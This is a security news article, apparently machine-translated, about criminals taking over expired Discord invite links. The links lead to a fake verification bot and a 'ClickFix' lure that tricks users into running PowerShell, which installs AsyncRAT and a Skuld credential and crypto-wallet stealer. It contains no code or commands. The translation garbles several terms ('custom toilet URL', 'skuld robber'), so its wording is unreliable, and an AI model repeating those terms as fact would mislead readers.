- Cybercriminals are discorded links to launch silent and devastating multi -stage malware attacks
- A Bot of False Discord cheats users to execute Powershell commands disguised as captcha fixes
- The invitation links of the old community now lead to malware servers that steal their data and digital assets
Cybercriminals are increasingly exploiting a less known defect in the Discord invitation system to lead offsembled users, particularly players, has affirmed new research.
A report by Check Point researchers found that the attackers manage to register previously valid invitation links with custom toilet URL.
The tactic implies kidnapping once legitimate and confident in discorded or eliminated invitation links and redirect them to malicious servers that house several stages malware campaigns.
Of confidence links to dangerous redirects
These kidnapped links, often integrated into old Forum publications, community pages or social networks, are being used to silently channel users to discord servers operated by threat actors.
Once in these false servers, users are received with what seems to be a standard verification process.
A bot called “safeguard” asks visitors to click on a “Verify” button, which starts an OAUTH2 process and redirect them to a Phishing site.
The site uses a social engineering method called “Clickfix”, where users are cheated to copy and execute a Powershell command under the appearance of fixing a broken captcha.
This action begins in silence the malware installation chain, with the attackers who use cloud services such as Pastebin, Github and Bitbucket to deliver useful loads in multiple stages, which allows them to be combined with normal network traffic.
Initial scripts discharge executables that recover additional encryption loads, which include Asyncrat, a tool that provides remote control attackers on infected systems and a variant tailored to the skuld robber designed to extract credentials and cryptocurrency wallet data.
Players have become a main objective, and campaigns even disguise malware as tools such as The Sims 4 DLC unlocking: a file called Sims4-unlocker.zip It was downloaded more than 350 times, highlighting the scope of the campaign.
Through intelligent evasion techniques, such as delayed execution and command line arguments verifications, malware often omits detection even of the best antivirus software.
Threats extend beyond the typical infections of malware. The skuld robber used in these attacks can extract phrases and passwords from cryptographic wallet seeds, effectively granting total control over the digital assets of the victims.
Taking into account the focus on theft of cryptocurrencies and the collection of credentials, people must reinforce their defenses with solid identity theft protection services.
These tools can monitor the unauthorized use of personal information, alert users of violations and help recover compromised digital identities.
While some might assume that the final point protection tools would protect them from these tactics, the modular structure of multiple layers of the attack often flies under radar.
To stay safe, users must be careful with Discord invitation links, especially those integrated into old content. In addition, avoid running unexpected scripts or follow suspicious verification steps.
